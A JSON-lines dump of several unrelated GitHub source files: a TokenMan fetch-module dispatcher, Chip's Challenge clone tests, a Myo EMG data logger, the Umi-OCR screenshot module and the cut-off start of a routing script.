меня!')\n","repo_name":"Alexnor1104/Coursework_VKinder","sub_path":"checking_code/vk_users.py","file_name":"vk_users.py","file_ext":"py","file_size_in_byte":3746,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33370785439","text":"from tokenman.fetch.applications import Applications\nfrom tokenman.fetch.drives import Drives\nfrom tokenman.fetch.emails import Emails\nfrom tokenman.fetch.groups import Groups\nfrom tokenman.fetch.organizations import Organizations\nfrom tokenman.fetch.serviceprincipals import ServicePrincipals\nfrom tokenman.fetch.users import Users\nfrom tokenman.state import RunState\nfrom typing import List\n\n\nclass Fetch:\n    \"\"\"Fetch command handler\"\"\"\n\n    @classmethod\n    def run(\n        cls,\n        state: RunState,\n        modules: List[str],\n    ):\n        \"\"\"Run the 'fetch' command\n\n        :param state: run state\n        :param modules: fetch modules to run\n        \"\"\"\n        # Run each module based on the provided flag data from the user\n        if any(m in modules for m in [\"users\", \"all\"]):\n            Users.fetch(state)\n\n        if any(m in modules for m in [\"groups\", \"all\"]):\n            Groups.fetch(state)\n\n        if any(m in modules for m in [\"organizations\", \"all\"]):\n            Organizations.fetch(state)\n\n        if any(m in modules for m in [\"emails\", \"all\"]):\n            Emails.fetch(state)\n\n        if any(m in modules for m in [\"applications\", \"all\"]):\n            Applications.fetch(state)\n\n        if any(m in modules for m in [\"serviceprincipals\", \"all\"]):\n            ServicePrincipals.fetch(state)\n\n        if any(m in modules for m in [\"drives\", \"all\"]):\n            Drives.fetch(state)\n","repo_name":"secureworks/TokenMan","sub_path":"tokenman/fetch/fetch.py","file_name":"fetch.py","file_ext":"py","file_size_in_byte":1416,"program_lang":"python","lang":"en","doc_type":"code","stars":74,"dataset":"github-code","pt":"52"} +{"seq_id":"26653707574","text":"import unittest\n\nfrom roverchip.levels.chipschallenge import ChipsChallenge\n\nfrom roverchip.test.test_level import MockDataFile\n\n\nclass Test_ChipDoor(unittest.TestCase):\n    def setUp(self):\n        cells = [[0, 0, 0]]\n        ctypes = [('Floor',)]\n        self.level = ChipsChallenge(MockDataFile(cells, ctypes))\n\n        self.player = self.level.add_sprite('Player', (0, 0))\n        self.chipdoor = self.level.add_sprite('ChipDoor', (1, 0))\n        self.player.carrying.add(self.level.add_sprite('Chip', (0, 0)))\n\n\n    def test_chipdoor_opens_if_chip_quota_met(self):\n        self.level.chipquota = 1\n        self.player.attempt_move(1)\n        self.assertFalse(self.chipdoor.is_solid)\n\n\n    def test_chipdoor_doesnt_open_if_chip_quota_not_met(self):\n        self.level.chipquota = 2\n        self.player.attempt_move(1)\n        
self.assertTrue(self.chipdoor.is_solid)\n","repo_name":"saltire/roverchip-tdd","sub_path":"roverchip/sprites/test/test_chipdoor.py","file_name":"test_chipdoor.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"7410529048","text":"\"\"\"\r\nRecord orientation and EMG data from Myo and log in a text file. \r\n\r\n\"\"\"\r\n\r\nfrom __future__ import print_function\r\nfrom myo.utils import TimeInterval\r\nimport myo\r\nimport collections\r\n\r\nclass Listener(myo.DeviceListener):\r\n\r\n def __init__(self):\r\n self.interval = TimeInterval(None, 0.05)\r\n self.orientation = None\r\n self.pose = myo.Pose.rest # unused\r\n self.emg_enabled = True\r\n self.locked = False\r\n self.rssi = None\r\n self.emg = None\r\n\r\n def output(self):\r\n if not self.interval.check_and_reset():\r\n return \r\n \r\n sample_parameters = collections.deque(maxlen=2)\r\n sample_limit = 50\r\n \r\n with open(\"sample_parameters.txt\") as file_sampleParam:\r\n for line in file_sampleParam:\r\n for num in line.split(','):\r\n sample_parameters.append(int(num))\r\n \r\n sample_count = sample_parameters[0]\r\n sample_number = sample_parameters[1]\r\n \r\n if sample_count == sample_limit:\r\n contVar = int(input(\"Do you want to continue? \"))\r\n if contVar == 1:\r\n sample_number = sample_number + 1\r\n sample_count = 0\r\n else:\r\n pass\r\n \r\n else: \r\n \r\n quat_w = open(\"quaternion_w\" + \"_\" + str(sample_number) + \".txt\", \"a+\")\r\n quat_i = open(\"quaternion_i\" + \"_\" + str(sample_number) + \".txt\", \"a+\")\r\n quat_j = open(\"quaternion_j\" + \"_\" + str(sample_number) + \".txt\", \"a+\")\r\n quat_k = open(\"quaternion_k\" + \"_\" + str(sample_number) + \".txt\", \"a+\")\r\n \r\n emgPod_1 = open(\"emgPod1\" + \"_\" + str(sample_number) + \".txt\", \"a+\")\r\n emgPod_2 = open(\"emgPod2\" + \"_\" + str(sample_number) + \".txt\", \"a+\") \r\n emgPod_3 = open(\"emgPod3\" + \"_\" + str(sample_number) + \".txt\", \"a+\") \r\n emgPod_4 = open(\"emgPod4\" + \"_\" + str(sample_number) + \".txt\", \"a+\")\r\n emgPod_5 = open(\"emgPod5\" + \"_\" + str(sample_number) + \".txt\", \"a+\") \r\n emgPod_6 = open(\"emgPod6\" + \"_\" + str(sample_number) + \".txt\", \"a+\") \r\n emgPod_7 = open(\"emgPod7\" + \"_\" + str(sample_number) + \".txt\", \"a+\") \r\n emgPod_8 = open(\"emgPod8\" + \"_\" + str(sample_number) + \".txt\", \"a+\") \r\n \r\n quaternions_read = collections.deque(maxlen=4) \r\n instances_quat = 4\r\n emg_read = collections.deque(maxlen=8)\r\n instances_emg = 8\r\n \r\n if self.orientation and self.emg:\r\n \r\n for element in self.orientation:\r\n quaternions_read.append(element)\r\n instances_quat = instances_quat - 1\r\n if instances_quat == 0:\r\n quat_w.write(str(quaternions_read[0]) + ' ')\r\n quat_i.write(str(quaternions_read[1]) + ' ') \r\n quat_j.write(str(quaternions_read[2]) + ' ')\r\n quat_k.write(str(quaternions_read[3]) + ' ')\r\n \r\n for element in self.emg:\r\n emg_read.append(element)\r\n instances_emg = instances_emg - 1\r\n if instances_emg == 0:\r\n emgPod_1.write(str(emg_read[0]) + ' ')\r\n emgPod_2.write(str(emg_read[1]) + ' ') \r\n emgPod_3.write(str(emg_read[2]) + ' ')\r\n emgPod_4.write(str(emg_read[3]) + ' ')\r\n emgPod_5.write(str(emg_read[4]) + ' ')\r\n emgPod_6.write(str(emg_read[5]) + ' ')\r\n emgPod_7.write(str(emg_read[6]) + ' ')\r\n emgPod_8.write(str(emg_read[7]) + ' ') \r\n \r\n sample_count = sample_count + 1\r\n \r\n #print(quaternions_read)\r\n 
#print(emg_read)\r\n \r\n quat_w.close()\r\n quat_i.close()\r\n quat_j.close()\r\n quat_k.close()\r\n \r\n emgPod_1.close()\r\n emgPod_2.close()\r\n emgPod_3.close()\r\n emgPod_4.close()\r\n emgPod_5.close()\r\n emgPod_6.close()\r\n emgPod_7.close()\r\n emgPod_8.close()\r\n \r\n file_sampleParam = open(\"sample_parameters.txt\", \"w\")\r\n file_sampleParam.write(str(sample_count) + ',' + str(sample_number))\r\n file_sampleParam.close()\r\n \r\n def on_connected(self, event):\r\n event.device.request_rssi()\r\n event.device.stream_emg(True)\r\n\r\n def on_rssi(self, event):\r\n self.rssi = event.rssi\r\n self.output()\r\n\r\n def on_pose(self, event):\r\n self.pose = event.pose\r\n self.output()\r\n\r\n def on_orientation(self, event):\r\n self.orientation = event.orientation\r\n self.output()\r\n\r\n def on_emg(self, event):\r\n self.emg = event.emg\r\n self.output()\r\n \r\n def on_unlocked(self, event):\r\n self.locked = False\r\n self.output()\r\n\r\n def on_locked(self, event):\r\n self.locked = True\r\n self.output()\r\n\r\n \r\nif __name__ == '__main__':\r\n \r\n myo.init('myo-sdk-win-0.9.0/bin/myo64.dll')\r\n hub = myo.Hub()\r\n listener = Listener()\r\n while hub.run(listener.on_event, 500):\r\n pass\r\n","repo_name":"jpdayrit/Design-of-Sign-AI-An-AI-Based-ASL-Translator","sub_path":"Scripts/Myo_DataCollect.py","file_name":"Myo_DataCollect.py","file_ext":"py","file_size_in_byte":4991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25432340064","text":"from utils.logger import GetLog\nfrom utils.config import Config, ScsModeFlag\nfrom utils.tool import Tool\nfrom utils.hotkey import Hotkey # 快捷键\nfrom ui.win_notify import NotifyClose # 关闭通知弹窗\nfrom ui.win_show_image import ShowImage # 显示图片窗口\n\n# 获取显���器信息\nfrom win32api import EnumDisplayMonitors, GetMonitorInfo\nfrom win32gui import CreateDC\nfrom win32print import GetDeviceCaps\n# 剪贴板\nfrom io import BytesIO\nfrom win32clipboard import OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, CF_DIB\n\nimport tkinter as tk\nfrom PIL import ImageGrab, ImageTk\nfrom enum import Enum\n\n# TODO :\n# The screenshot module works by first getting a complete screenshot of the virtual screen (all the monitors' frames put together). Then create a canvas that\n# The starting point of the canvas (top-left corner) is the top-left corner of the virtual screen (xy may be negative), the width of the canvas is the width of the virtual screen, # and then display the full screenshot on the canvas.\n# Then display the full screenshot on the canvas, listening for user presses and drags. The position of the screenshot on the canvas should correspond to the real screen.\n# But the problem is that the canvas, as a window, has a scaling of its own (i.e. the scaling of the screen it was born on).\n# If the scaling ratio of one of the multiple screens does not match the scaling ratio of the canvas, their logical coordinates will be misaligned under a certain alignment, which is manifested as a misaligned screen.\n# I was hoping to get the physical and logical resolutions of all the screens, get their scaling ratios, and then calculate the \"true\" logical coordinates in the canvas coordinate system.\n# But I couldn't figure it out. There are too many factors involved.\n# The way the screen is arranged, the state of the software when you click on it, the position of the canvas when it is created ...... 
can all affect the logical coordinates and the logical resolution, # making it very difficult to calculate the logical coordinates of the canvas.\n# making it difficult to calculate the anchor points and ratios that should be corrected for the screen in the canvas coordinate system.\n\nLog = GetLog()\n\n\ndef _ScreenshotClose(flag, errMsg=None):\n Log.info('End of Screenshot')\n Config.main.closeScreenshot(flag, errMsg)\n\n\ndef ScreenshotCopy():\n '''Take a screenshot, save it to the clipboard, and then call the main window's close Screenshot interface.'''\n NotifyClose() # 关闭通知弹窗\n scsMode = Config.get('scsMode').get(Config.get(\n 'scsModeName'), ScsModeFlag.multi) # 当前截屏模式\n if scsMode == ScsModeFlag.multi: # 内置截图模式\n SSWin.startGrab()\n elif scsMode == ScsModeFlag.system: # 系统截图模式\n SSSys.startGrab()\n else:\n _ScreenshotClose(False, '未知的截图模式!')\n\n\nclass ScreenshotSys(): # 系统截图模式\n\n def __init__(self):\n self.isInitKey = False\n self.isWorking = False\n self.checkTimeMax = 10 # 最大检查次数\n self.checkTimeRate = 20 # 检查间隔频率,毫秒\n self.checkTime = 0 # 当前剩余检查次数\n self.position = (0, 0)\n\n def startGrab(self): # 启动截屏\n '''启动系统截图。若通过快捷键进入,必须为win+shift+S'''\n Tool.emptyClipboard() # 清空剪贴板\n self.isWorking = True\n if not self.isInitKey:\n self.__initKey()\n if not Hotkey.isPressed('win'): # 不是通过快捷键进入\n Hotkey.send('win+shift+s') # 发送系统截图快捷键\n Log.info('System Screenshot Launch')\n\n def __initKey(self): # 初始化监听\n # 绑定全局事件\n Hotkey.addRelease( # Esc抬起,系统截图失败\n 'esc', lambda: self.__close(False))\n Hotkey.addMouseButtonDown(self.__onDown) # 注册监听鼠标左/右按下\n Hotkey.addMouseButtonUp(self.__onUp) # 注册监听鼠标左/右抬起\n self.isInitKey = True\n\n def __onDown(self, pos): # 用户操作开始\n if self.isWorking:\n self.position = pos # 获取鼠标当前位置\n\n def __onUp(self, pos): # 用户操作结束\n if self.isWorking:\n if self.position == pos: # 鼠标起始结束位置相同,截图失败\n self.__close(False)\n return\n self.checkTime = 0\n self.__checkClipboard()\n\n def __checkClipboard(self): # 检查剪贴板中是否已存在截图\n if self.checkTime >= self.checkTimeMax:\n self.__close(False, 'Failed to read clipboard') # 检查次数超限,截图失败\n return\n clipData = Tool.getClipboardFormat() # 读取剪贴板\n if clipData == 2: # The system screenshot has been saved to the clipboard memory, the screenshot is successful!\n Log.info(f' The first {self.checkTime} check')\n if Config.get('isShowImage'): # 显示图片展示窗\n ShowImage(imgPIL=ImageGrab.grabclipboard())\n self.__close(False)\n else:\n self.__close(True)\n return\n Log.info(f' The first {self.checkTime} check')\n self.checkTime += 1\n # 定时器指定下一轮查询\n Config.main.win.after(self.checkTimeRate, self.__checkClipboard)\n\n def __close(self, flag=False, errMsg=None): # 退出\n if self.isWorking:\n Hotkey.removeMouse() # 注销监听鼠标\n self.isInitKey = False\n self.isWorking = False\n _ScreenshotClose(flag, errMsg)\n\n\nSSSys = ScreenshotSys()\n\n\nclass _DrawMode(Enum):\n ready = 1 # 准备中\n drag = 2 # 拖拽中\n\n\nclass ScreenshotWin(): # 内置截图模式\n OB = -100 # 元素隐藏屏幕外的位置\n\n def __init__(self):\n self.isInitWin = False # 防止重复初始化窗体\n self.isInitGrab = False # 防止未初始化截图参数时触发事件\n self.errMsg = None # 记录错误,传给调用者\n self.screenScaleList = None # 记录各个屏幕分别的缩放比例\n self.promptSss = True # 本次使用期间显示缩放提示\n self.lastScInfos = None # 上一轮的屏幕参数\n\n def startGrab(self): # 启动截屏\n '''启动区域截图'''\n # “虚拟屏幕”指多显示器画面的拼凑在一起的完整画面\n self.image = ImageGrab.grab(all_screens=True) # 对整个虚拟屏幕截图,物理分辨率\n\n if not self.isInitWin:\n self.__initWin()\n\n self.imageResult = None # 结果图片\n self.sourceBox = None # 截图包围盒原始信息\n self.drawMode = _DrawMode.ready # 准备模式\n # 获取所有屏幕的信息,提取其中的坐标信息(虚拟,非物理分辨率)\n scInfos = 
EnumDisplayMonitors() # 所有屏幕的信息\n self.scBoxList = [s[2] for s in scInfos] # 提取虚拟分辨率的信息\n # 计算缩放比例,若不一致,则发送提示弹窗\n # 条件:需要提示 | 大于一块屏幕时 | 本次信息与上次不同 | 设置需要提示\n scInfosLen = len(scInfos)\n if self.promptSss and scInfosLen > 1 and not self.lastScInfos == scInfos and Config.get('promptScreenshotScale'):\n scList = []\n self.lastScInfos = scInfos # 屏幕信息与上次一样时跳过检测,减少耗时\n # 提取所有屏幕缩放比例\n for index, sc in enumerate(scInfos):\n # 获取设备信息字典,得到设备名称 Device\n # 物理设备信息(dict) = GetMonitorInfo(hMonitor)\n info = GetMonitorInfo(scInfos[index][0])\n # 为显示设备创建设备上下文,得到物理设备句柄 hDC\n # 设备句柄(int) = CreateDC (设备名称, 设备名称 , None )\n hDC = CreateDC(info['Device'], info['Device'], None)\n w = GetDeviceCaps(hDC, 118) # 常量 win32con.DESKTOPHORZRES\n # h = GetDeviceCaps(hDC, 117) # 常量 win32con.DESKTOPVERTRES\n # 得到缩放比,即windows的“更改文本、应用等项目的大小”\n s = w / (sc[2][2]-sc[2][0])\n scList.append(s)\n # 检查缩放比例是否一致\n isEQ = True\n for i in range(1, scInfosLen):\n if not abs(scList[i] - scList[0]) < 0.001:\n isEQ = False\n break\n # 不一致,提示\n if not isEQ:\n self.screenScaleList = scList\n msg = f'''You are currently using {scInfosLen} blocks of screens with inconsistent scaling, respectively {scList} 。\n\nIt may result in abnormal Umi-OCR screenshots, such as incomplete screen, distorted window, no text recognised, and so on.\nIf this happens.\nPlease adjust all screens to the same value in the system settings [Change the size of text, application and other items].\nOr, please switch the screenshot mode to [Windows System Screenshot] in the software settings. \\n'''\n Config.main.panelOutput(msg)\n Config.main.notebook.select(\n Config.main.notebookTab[1]) # 转到输出卡\n if tk.messagebox.askyesno('draw attention to sth.',\n f'{msg}\\nClick [Yes] if you will not be prompted again for this use, or [No] if you will not be prompted permanently.'):\n self.promptSss = False\n else:\n Config.set('promptScreenshotScale', False, isSave=True)\n # 计算虚拟屏幕最左上角和最右下角的坐标\n scUp, scDown, scLeft, scRight = 0, 0, 0, 0\n for s in self.scBoxList: # 遍历所有屏幕,获取最值\n if s[0] < scLeft: # 左边缘\n scLeft = s[0]\n if s[1] < scUp: # 上边缘\n scUp = s[1]\n if s[2] > scRight: # 右边缘\n scRight = s[2]\n if s[3] > scDown: # 下边缘\n scDown = s[3]\n # 计算虚拟屏幕的宽和高,请确保屏幕对齐\n scWidth, scHeight = scRight - scLeft, scDown - scUp\n # 多显示器处理完毕\n self.scBoxVirtual = (scLeft, scUp, scRight, scDown,\n scWidth, scHeight)\n self.allScale = self.image.size[0] / scWidth # 整个虚拟屏幕的缩放比例\n # 主窗口设置为铺满虚拟屏幕\n bd, bdp = 2, 1 # 边缘要额外拓展1像素,以免无法接收到鼠标在边缘的点击\n scStr = f'{scWidth+bd}x{scHeight+bd}+{scLeft-bdp}+{scUp-bdp}'\n # print(f'缩放比:{self.allScale}')\n # self.topwin.tk.call('tk', 'scaling', self.allScale/75)\n self.topwin.geometry(scStr)\n self.canvas['width'] = scWidth+bd\n self.canvas['height'] = scHeight+bd\n # 原图改物理为虚拟屏幕分辨率,转成tk格式,导入画布\n self.imageTK = ImageTk.PhotoImage(\n self.image.resize((scWidth, scHeight)))\n cimg = self.canvas.create_image( # 底图\n bdp, bdp, anchor='nw', image=self.imageTK)\n self.canvas.lower(cimg) # 移动到最下方\n\n self.topwin.deiconify() # 显示窗口\n self.isInitGrab = True\n Log.info('初始化截图')\n self.__flash() # 闪光\n if Config.get('isDebug'): # 显示debug信息\n c = 2 if self.debugList else 1 # 若上一轮已显示,则调用两次以刷新\n for i in range(c): # 否则,调用一次以打开\n self.__switchDebug()\n\n def __initWin(self): # 初始化窗体\n self.isInitWin = True\n # 创建窗口\n self.topwin = tk.Toplevel()\n self.topwin.withdraw() # 隐藏窗口\n self.topwin.overrideredirect(True) # 无边框\n self.topwin.configure(bg='black')\n # self.topwin.attributes(\"-alpha\", 0.8) # 透明(调试用)\n self.topwin.attributes('-topmost', 1) # 设置层级最前\n # 创建画布及画布元素。后创建的层级在上。\n 
self.canvas = tk.Canvas(self.topwin, cursor='plus', bg=None,\n highlightthickness=0, borderwidth=0) # 取消边框\n self.canvas.pack(fill='both')\n # 瞄准盒\n rec1 = self.canvas.create_rectangle( # 实线底层\n self.OB, self.OB, self.OB, self.OB, outline=Config.get('scsColorBoxDown'), width=2)\n rec2 = self.canvas.create_rectangle( # 虚线表层\n self.OB, self.OB, self.OB, self.OB, outline=Config.get('scsColorBoxUp'), width=2, dash=10)\n self.sightBox = (rec1, rec2)\n self.sightBoxXY = [self.OB, self.OB, self.OB, self.OB] # 瞄准盒坐标\n # 瞄准线\n lineColor = Config.get('scsColorLine')\n lineW = self.canvas.create_line( # 纵向\n self.OB, self.OB, self.OB, self.OB, fill=lineColor, width=1)\n lineH = self.canvas.create_line( # 横向\n self.OB, self.OB, self.OB, self.OB, fill=lineColor, width=1)\n self.sightLine = (lineW, lineH)\n # debug模块\n self.debugXYBox = self.canvas.create_rectangle( # 坐标下面的底\n self.OB, self.OB, self.OB, self.OB, fill='yellow', outline='#999', width=1)\n self.debugXYText = self.canvas.create_text(self.OB, self.OB, # 显示坐标\n font=('Malgun Gothic', 15, 'bold'), fill='red', anchor='nw')\n self.debugList = [] # 显示屏幕信息\n # 闪光模块\n self.flashList = [] # 闪光元素\n # 绑定全局事件\n Hotkey.add('esc', self.__onClose) # 绑定Esc退出\n Hotkey.add('ctrl+shift+alt+d', self.__switchDebug) # 切换调试信息\n # 方向键控制鼠标移动\n Hotkey.add('up', lambda: self.__keyMotion(0, -1))\n Hotkey.add('down', lambda: self.__keyMotion(0, 1))\n Hotkey.add('left', lambda: self.__keyMotion(-1, 0))\n Hotkey.add('right', lambda: self.__keyMotion(1, 0))\n # 绑定画布事件\n self.canvas.bind('', self.__onDown) # 左键按下\n self.canvas.bind('', self.__repaint) # 右键按下\n self.canvas.bind('', self.__onUp) # 左键松开\n self.canvas.bind('', self.__onMotion) # 鼠标移动\n self.canvas.bind('', self.__onMotion) # 鼠标进入,用于初始化瞄准线\n Log.info('Umi Screenshot Launch')\n\n def __hideElement(self, ele, size=4): # 隐藏一个画布元素\n # 实际上是挪到画布外\n if size == 2:\n self.canvas.coords(ele, self.OB, self.OB)\n elif size == 4:\n self.canvas.coords(ele, self.OB, self.OB, self.OB, self.OB)\n\n def __onDown(self, event): # 鼠标按下\n if self.drawMode == _DrawMode.ready: # 进入拖拽模式\n self.drawMode = _DrawMode.drag\n # 记录起始点\n self.sightBoxXY[0], self.sightBoxXY[1] = event.x, event.y\n self.sightBoxXY[2], self.sightBoxXY[3] = event.x, event.y\n # 隐藏瞄准线\n for i in (0, 1):\n self.__hideElement(self.sightLine[i], 4)\n\n def __onUp(self, event): # 鼠标松开\n if self.drawMode == _DrawMode.drag: # 离开拖拽模式\n self.drawMode = _DrawMode.ready\n # 记录结束点\n self.sightBoxXY[2], self.sightBoxXY[3] = event.x, event.y\n self.__createGrabImg() # 生成剪切图像\n self.__onClose() # 关闭窗口\n\n def __onMotion(self, event): # 鼠标移动\n if self.drawMode == _DrawMode.ready: # 准备模式,刷新瞄准线\n self.canvas.coords(self.sightLine[0],\n 0, event.y, self.scBoxVirtual[4], event.y)\n self.canvas.coords(self.sightLine[1],\n event.x, 0, event.x, self.scBoxVirtual[5])\n elif self.drawMode == _DrawMode.drag: # 拖拽模式,刷新瞄准盒\n self.sightBoxXY[2], self.sightBoxXY[3] = event.x, event.y\n for i in (0, 1):\n self.canvas.coords(self.sightBox[i],\n self.sightBoxXY[0], self.sightBoxXY[1], event.x, event.y)\n if self.debugList:\n self.canvas.coords(self.debugXYText, event.x+6, event.y+3)\n self.canvas.coords(self.debugXYBox, event.x+3,\n event.y+3, event.x+130, event.y+28)\n # self.canvas.itemconfig(self.debugXYText, {'text':\n # f'{event.x} , {event.y}'})\n self.canvas.itemconfig(self.debugXYText, {'text':\n f'{event.x_root} , {event.y_root}'})\n\n def __keyMotion(self, x, y): # 键盘控制鼠标移动\n if not self.isInitGrab:\n return\n pos = Hotkey.getMousePos()\n pos = (pos[0]+x, pos[1]+y)\n 
def __keyMotion(self, x, y):  # move the mouse with the arrow keys\n        if not self.isInitGrab:\n            return\n        pos = Hotkey.getMousePos()\n        pos = (pos[0]+x, pos[1]+y)\n        Hotkey.setMousePos(pos)\n\n    def __repaint(self, event):  # repaint\n        Log.info('repaint')\n        if self.drawMode == _DrawMode.drag:  # already dragging\n            self.drawMode = _DrawMode.ready  # leave drag mode\n            self.sightBoxXY = [self.OB, self.OB, self.OB, self.OB]\n            for i in (0, 1):  # hide the aiming box, show the crosshair\n                self.__hideElement(self.sightBox[i], 4)\n            self.canvas.coords(self.sightLine[0],\n                               0, event.y, self.scBoxVirtual[4], event.y)\n            self.canvas.coords(self.sightLine[1],\n                               event.x, 0, event.x, self.scBoxVirtual[5])\n        elif self.drawMode == _DrawMode.ready:  # still in ready mode\n            self.__onClose()  # close\n\n    def __createGrabImg(self):  # build the cropped image\n        box = self.sightBoxXY\n        if box[0] < 0 and box[1] < 0 and box[2] < 0 and box[3] < 0:\n            pass  # nothing selected\n        elif box[0] == box[2] or box[1] == box[3]:\n            pass  # zero-area selection, invalid\n        else:\n            if box[0] > box[2]:  # swap if the coordinates are misordered (second point not to the bottom-right of the first)\n                box[0], box[2] = box[2], box[0]\n            if box[1] > box[3]:\n                box[1], box[3] = box[3], box[1]\n            self.sourceBox = tuple(box)  # record the original box values before scaling\n            for i in range(4):\n                box[i] *= self.allScale  # apply the scaling factor\n            self.imageResult = self.image.crop(box)  # crop to produce the final screenshot data\n\n    def __onClose(self, event=None):  # close the window\n        if not self.isInitGrab:\n            return\n        # hide the elements\n        for i in (0, 1):\n            self.__hideElement(self.sightBox[i])\n            self.__hideElement(self.sightLine[i])\n        self.topwin.withdraw()  # hide the window\n        # reset the state\n        self.isInitGrab = False\n        self.drawMode = _DrawMode.ready\n        self.errMsg = None\n        flag = self.copyImage()  # copy the image\n        self.image = None  # release the image\n        self.imageResult = None  # release\n        _ScreenshotClose(flag, self.errMsg)\n\n    def __flash(self):  # edge flash, signals that the screenshot was taken\n        color = 'white'\n        width = 100\n\n        def closeFlash():  # end the flash\n            for i in self.flashList:\n                self.canvas.delete(i)\n            self.flashList = []\n\n        for box in self.scBoxList:\n            p1x, p1y, p2x, p2y = box\n            p1x -= self.scBoxVirtual[0]\n            p2x -= self.scBoxVirtual[0]\n            p1y -= self.scBoxVirtual[1]\n            p2y -= self.scBoxVirtual[1]\n            e = self.canvas.create_rectangle(\n                p1x, p1y, p2x, p2y, outline=color, width=width)\n            self.flashList.append(e)\n        self.topwin.after(200, closeFlash)\n\n    def __switchDebug(self, event=None):  # toggle the debug overlay\n        if not self.isInitGrab:\n            return\n        color = 'red'\n        if self.debugList:  # remove the debug info\n            Config.set('isDebug', False)\n            for i in self.debugList:\n                self.canvas.delete(i)\n            self.debugList = []\n            self.__hideElement(self.debugXYBox, 4)\n            self.__hideElement(self.debugXYText, 2)\n        else:  # create the debug info\n            Config.set('isDebug', True)\n            for index, box in enumerate(self.scBoxList):\n                p1x, p1y, p2x, p2y = box\n                p1x -= self.scBoxVirtual[0]\n                p2x -= self.scBoxVirtual[0]\n                p1y -= self.scBoxVirtual[1]\n                p2y -= self.scBoxVirtual[1]\n                e = self.canvas.create_rectangle(\n                    p1x, p1y, p2x, p2y, outline=color, width=3)\n                self.debugList.append(e)\n                e = self.canvas.create_line(\n                    p1x, p1y, p2x, p2y, fill=color, width=3)\n                self.debugList.append(e)\n                e = self.canvas.create_line(\n                    p2x, p1y, p1x, p2y, fill=color, width=3)\n                self.debugList.append(e)\n                # text info box\n                e = self.canvas.create_rectangle(\n                    p1x+10, p1y+10, p1x+440, p1y+60, fill='white', width=0)\n                self.debugList.append(e)\n                e = self.canvas.create_text(p1x+15, p1y+15,\n                                            font=('', 15, 'bold'), fill=color, anchor='nw',\n                                            text=f'screen{index+1}: {box} | {box[2]-box[0]},{box[3]-box[1]}')\n                self.debugList.append(e)\n                e = self.canvas.create_text(p1x+15, p1y+43,\n                                            font=('', 10, ''), fill=color, anchor='nw',\n                                            text=f'Press Ctrl+Shift+Alt+D to exit debug mode')\n                self.debugList.append(e)\n            self.canvas.lift(self.debugXYBox)  # move to the top\n            self.canvas.lift(self.debugXYText)  # move to the top\n\n    
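The normalise-then-scale-then-crop step in __createGrabImg can be sketched independently of the class; a hedged, simplified version with illustrative names:

from PIL import Image

def crop_selection(image, box, scale):
    # Normalise so (x0, y0) is the top-left corner regardless of drag direction.
    x0, x1 = sorted((box[0], box[2]))
    y0, y1 = sorted((box[1], box[3]))
    if x0 == x1 or y0 == y1:
        return None  # zero-area selection
    # Map canvas coordinates back to the full-resolution source image.
    return image.crop((x0 * scale, y0 * scale, x1 * scale, y1 * scale))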
def copyImage(self):\n        '''Copy the screenshot to the clipboard. Returns True on success, otherwise False.'''\n        if not self.imageResult:\n            return False\n        # convert the image to bytes\n        output = BytesIO()\n        self.imageResult.save(output, 'BMP')  # save as a bitmap\n        imgData = output.getvalue()[14:]  # strip the header\n        output.close()\n        if Config.get('isShowImage'):  # show the image preview window\n            b = self.sourceBox\n            p = (b[0], b[1], b[2]-b[0], b[3]-b[1])\n            ShowImage(imgPIL=self.imageResult, imgData=imgData, initPos=p)\n            return False\n        else:  # recognise directly\n            try:\n                OpenClipboard()  # open the clipboard\n                EmptyClipboard()  # clear the clipboard\n                SetClipboardData(CF_DIB, imgData)  # write\n            except Exception as err:\n                self.errMsg = f'The bitmap cannot be written to the clipboard; please check whether another programme is occupying it. \\n{err}'\n                return False\n            finally:\n                try:\n                    CloseClipboard()  # close\n                except Exception as err:\n                    self.errMsg = f'Unable to close the clipboard. \\n{err}'\n                    return False\n        return True\n\n\nSSWin = ScreenshotWin()\n\n# class e:\n#     def __init__(self, x, y):\n#         self.x = x\n#         self.y = y\n# self.__onDown(e(0, 0))\n# self.__onUp(e(50, 20))\n\n# total size of the virtual screen: win32api.GetSystemMetrics\n# virtualX = GetSystemMetrics(78)  # constant win32con.SM_CXVIRTUALSCREEN\n# virtualY = GetSystemMetrics(79)  # constant win32con.SM_CYVIRTUALSCREEN\n# print(f'virtual size: {virtualX} {virtualY}\\nreal size: {self.image.size}')\n# print(f'overall scale factor: {self.image.size[0]/virtualX}')\n","repo_name":"theangkko/Umi-OCR","sub_path":"ui/win_screenshot.py","file_name":"win_screenshot.py","file_ext":"py","file_size_in_byte":23920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"15386360021","text":"\r\n#heuristics function.\r\n#--Manhattan distance\r\ndef h(p1, p2):\r\n\tx1, y1 = p1\r\n\tx2, y2 = p2\r\n\treturn abs(x1 - x2) + abs(y1 - y2)\r\n\r\n#get position where we clicked\r\ndef get_clicked_pos(pos, rows, width):\r\n\tgap = width // rows\r\n\ty, x = pos\r\n\r\n\trow = y // gap\r\n\tcol = x // gap\r\n\r\n\treturn row, col","repo_name":"Renwarren/Astar-Visualizer","sub_path":"A-star Pathfinding Visualizing/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"} +{"seq_id":"37229991345","text":"# coding: UTF-8\nimport itertools\n\n\ntimeBount = [[0, 24], [1, 4], [4, 6], [1, 2],\n             [4, 7], [3, 5.5], [2, 5], [5, 8], [1.5, 4]]\n\ntimeReload = [0, 1, 2, 1, 3, 2, 2.5, 3, 0.8]\n\nadj = [[0, 40, 60, 75, 90, 200, 100, 160, 80],\n       [40, 0, 65, 40, 100, 50, 75, 110, 100],\n       [60, 65, 0, 75, 100, 100, 75, 75, 75],\n       [75, 40, 75, 0, 100, 50, 90, 90, 150],\n       [90, 100, 100, 100, 0, 100, 75, 75, 100],\n       [200, 50, 100, 50, 100, 0, 70, 90, 75],\n       [100, 75, 75, 90, 75, 70, 0, 70, 100],\n       [160, 110, 75, 90, 75, 90, 70, 0, 100],\n       [80, 100, 75, 150, 100, 75, 100, 100, 0]]\n\n\ndef isTimeOk(source, target, timerange=None):  # tested\n    if 